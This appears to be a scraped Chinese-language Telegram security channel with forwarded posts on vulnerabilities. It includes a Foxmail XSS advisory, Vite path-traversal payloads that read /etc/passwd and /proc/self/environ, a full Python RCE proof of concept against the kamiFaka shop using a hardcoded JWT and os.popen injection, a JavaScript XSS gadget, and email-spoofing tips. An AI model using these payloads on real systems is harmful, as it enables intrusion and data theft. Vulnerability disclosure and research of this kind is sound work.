Forwarded from LoopDNS资讯播报
漏洞:Foxmail邮件客户端存在跨站脚本攻击漏洞
漏洞编号:CNTA-2025-0007
重要等级:中等
影响范围:< 7.2.25 [Windows]
漏洞类型:跨站脚本
漏洞概述:该漏洞由于 Foxmail 在加载邮件正文中的 HTML 内容时,对危险内容的过滤处理逻辑存在缺陷。攻击者可利用该漏洞构造包含恶意指令代码的电子邮件,受害者在使用Foxmail打开浏览电子邮件时,无需额外点击,恶意指令代码即被用户主机加载并执行。
风险描述:
1. 攻击者以用户身份即可获取权限。
2. 攻击者无需以用户进行额外点击操作,受害者只需使用 Foxmail 打开或预览带有恶意脚本的邮件,恶意代码即可在后台加载并执行。
3. 受害者设备上,无论是否点击链接、加载图像或执行附件文件,只要客户端自动处理或显示邮件内容,即可能被利用
处置建议: Foxmail 官方已发布修复版本,建议用户务必及时更新至最新版本。如无法立刻升级,可先暂停使用受影响的 Foxmail 客户端版本,或临时改用网页版或其他平台的安全邮件客户端,以确保邮件收发的安全性和稳定性。
补充:该漏洞利用方式简单且具备规模化利用的条件,目前已存在关于该漏洞的在野利用行为
参考信息:国家计算机网络应急技术处理协调中心
漏洞编号:CNTA-2025-0007
重要等级:中等
影响范围:< 7.2.25 [Windows]
漏洞类型:跨站脚本
漏洞概述:该漏洞由于 Foxmail 在加载邮件正文中的 HTML 内容时,对危险内容的过滤处理逻辑存在缺陷。攻击者可利用该漏洞构造包含恶意指令代码的电子邮件,受害者在使用Foxmail打开浏览电子邮件时,无需额外点击,恶意指令代码即被用户主机加载并执行。
风险描述:
1. 攻击者以用户身份即可获取权限。
2. 攻击者无需以用户进行额外点击操作,受害者只需使用 Foxmail 打开或预览带有恶意脚本的邮件,恶意代码即可在后台加载并执行。
3. 受害者设备上,无论是否点击链接、加载图像或执行附件文件,只要客户端自动处理或显示邮件内容,即可能被利用
处置建议: Foxmail 官方已发布修复版本,建议用户务必及时更新至最新版本。如无法立刻升级,可先暂停使用受影响的 Foxmail 客户端版本,或临时改用网页版或其他平台的安全邮件客户端,以确保邮件收发的安全性和稳定性。
补充:该漏洞利用方式简单且具备规模化利用的条件,目前已存在关于该漏洞的在野利用行为
参考信息:国家计算机网络应急技术处理协调中心
🌚2👍1
Forwarded from Eternal_安全内参
/@fs/etc/passwd?import&?inline=1.wasm?init
/@fs/C://windows/win.ini?import&?inline=1.wasm?init
Forwarded from Puddin在TG上看到了啥
Eternal_安全内参
/@fs/etc/passwd?import&?inline=1.wasm?init /@fs/C://windows/win.ini?import&?inline=1.wasm?init
vite还在发力
CVE-2025-31125(CVE-2025-30208的Bypass)
CVE-2025-31125(CVE-2025-30208的Bypass)
Forwarded from Puddin在TG上看到了啥
Puddin在TG上看到了啥
vite还在发力 CVE-2025-31125(CVE-2025-30208的Bypass)
vite还在在发力
CVE-2025-31486
/@fs/etc/passwd?.svg?.wasm?init
CVE-2025-31486
Forwarded from Puddin在TG上看到了啥
Puddin在TG上看到了啥
vite还在在发力 /@fs/etc/passwd?.svg?.wasm?init CVE-2025-31486
vite还在在在发力
CVE-2025-32395
需要猜vite项目所在地址,可以从403的返回界面看到(
/@fs/app#/../proc/self/environ
CVE-2025-32395
需要猜vite项目所在地址,可以从403的返回界面看到(
Forwarded from Puddin在TG上看到了啥
佰阅发卡存在RCE漏洞,省流:eval解析json+硬编码JWT secret
POC:
https://mp.weixin.qq.com/s/3fT7r6bHfzXs7vX0rMI54g
POC:
import requests
cmd = "ls /"
url = "http://xxx"
jwt_token = "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZGVudGl0eSI6eyJlbWFpbCI6ImFkbWluQHFxLmNvbSJ9LCJleHAiOjE3NDQ4NzExNDZ9.jf8YjUqXWVschKPSvKjv7lcQZrhynLla6AWqH6WWavg"
resp = requests.post(
url + "/api/v4/update_pays",
headers={"Authorization": "Bearer " + jwt_token},
json={
"data": {
# "config": f"[exec({payload!r}), f()][-1]",
"config": f"__import__('os').popen({cmd!r}).read()",
"icon": "\u652f\u4ed8\u5b9d",
"id": 2,
"info": "0\u8d39\u7387\u5b9e\u65f6\u5230\u8d26",
"isactive": False,
"name": "V\u514d\u7b7e\u652f\u4ed8\u5b9d",
}
},
)
resp = requests.get(
url + "/api/v4/get_pays",
headers={"Authorization": "Bearer " + jwt_token},
)
print([item["config"] for item in resp.json() if item.get("id") == 2].pop())
https://mp.weixin.qq.com/s/3fT7r6bHfzXs7vX0rMI54g
GitHub
GitHub - Baiyuetribe/kamiFaka: 一款基于VUE3.0的高颜值卡密发卡系统,特别适合虚拟商品、知识付费等。
一款基于VUE3.0的高颜值卡密发卡系统,特别适合虚拟商品、知识付费等。. Contribute to Baiyuetribe/kamiFaka development by creating an account on GitHub.
😁4❤1
Forwarded from Pseudorandom Thoughts
https://www.kandji.io/blog/pasivrobber
TLDR:恁美国OSINT又对着China哈气了,路边拾了个美亚的取证工具一通分析然后怪他主机信息收集太多
Meiya:什么叫我竟然收集信息了,我不收集信息我干嘛
TLDR:恁美国OSINT又对着China哈气了,路边拾了个美亚的取证工具一通分析然后怪他主机信息收集太多
Meiya:什么叫我竟然收集信息了,我不收集信息我干嘛
:你们美国OSINT就不能至少要求一下,做中国威胁情报一定要懂汉语
:错了 做中国情报一定要不懂汉语(
不然就不好意思喊了
www.kandji.io
PasivRobber: Chinese Spyware or Security Tool?
In March 2025, our team found a suspicious mach-O file named wsus. Read the full analysis on its likely origins, target users, and observed functionality.
Forwarded from Puddin在TG上看到了啥
这个东西是JS的标签模板语法,本来是用来标记一个模板的
所以
f`aaa${arg}bbb`
就相当于f(["aaa","bbb"], arg)
所以
''.replace.call`1${/.../}${alert}`
就相当于''.replace.call(["1","",""], /.../, alert)
,也就是把第一个参数转成字符串"1,,"
,用正则/.../
匹配这个字符串,然后传给alert
MDN Web Docs
模板字符串 - JavaScript | MDN
模板字面量是用反引号(`)分隔的字面量,允许多行字符串、带嵌入表达式的字符串插值和一种叫带标签的模板的特殊结构。
👍1
Forwarded from Puddin在TG上看到了啥
所以说DNS配置不正确就可以伪造这个域名的邮件...
DNS中MX记录标记这个域名可以发送邮件,SPF记录标记哪些服务器可以用这个域名发送邮件
所以如果一个域名(比如说aaa.com)没有配置SPF,那任意服务器都可以用admin@aaa.com之类的邮箱给别人发邮件...
最后伪造邮件可以用emkei.cz这个网站
https://mp.weixin.qq.com/s/UFUBRg3BL1EMy0urkb6xxA
DNS中MX记录标记这个域名可以发送邮件,SPF记录标记哪些服务器可以用这个域名发送邮件
所以如果一个域名(比如说aaa.com)没有配置SPF,那任意服务器都可以用admin@aaa.com之类的邮箱给别人发邮件...
最后伪造邮件可以用emkei.cz这个网站
https://mp.weixin.qq.com/s/UFUBRg3BL1EMy0urkb6xxA
👍2🥰1
Forwarded from 新浪维基 (₴łⱠVɆⱤ₩ØⱠ₣)
This media is not supported in your browser
VIEW IN TELEGRAM
Clash-Verge-Rev 公网 RCE
https://github.com/bron1e/Clash-Verge-Rev-RCE
使用DNS重绑定+`0.0.0.0`day提升我们的CSRF,从而绕过SOP和PNA限制,这真的很酷~
https://github.com/bron1e/Clash-Verge-Rev-RCE
使用DNS重绑定+`0.0.0.0`day提升我们的CSRF,从而绕过SOP和PNA限制,这真的很酷~
❤1👍1
Forwarded from 蓝点网订阅频道 (山外的鸭子哥)
#系统资讯 由于开发商失误现在所有 Kali Linux 用户必须手动更新 repo 密钥,否则未来几天 Kali Linux 将无法正常安装任何更新。
出现这种情况是因为 Kali Linux 开发者不慎丢失存储库密钥,如果用户不手动更新最新创建的密钥,则安装更新时会因为无法验证签名而失败。
查看全文:https://ourl.co/108901
→欢迎关注:蓝点网订阅频道
→欢迎关注:蓝点网X/Twitter
→联系编辑:山外的鸭子哥
→CN2GIA服务器仅99元/年
出现这种情况是因为 Kali Linux 开发者不慎丢失存储库密钥,如果用户不手动更新最新创建的密钥,则安装更新时会因为无法验证签名而失败。
查看全文:https://ourl.co/108901
→欢迎关注:蓝点网订阅频道
→欢迎关注:蓝点网X/Twitter
→联系编辑:山外的鸭子哥
→CN2GIA服务器仅99元/年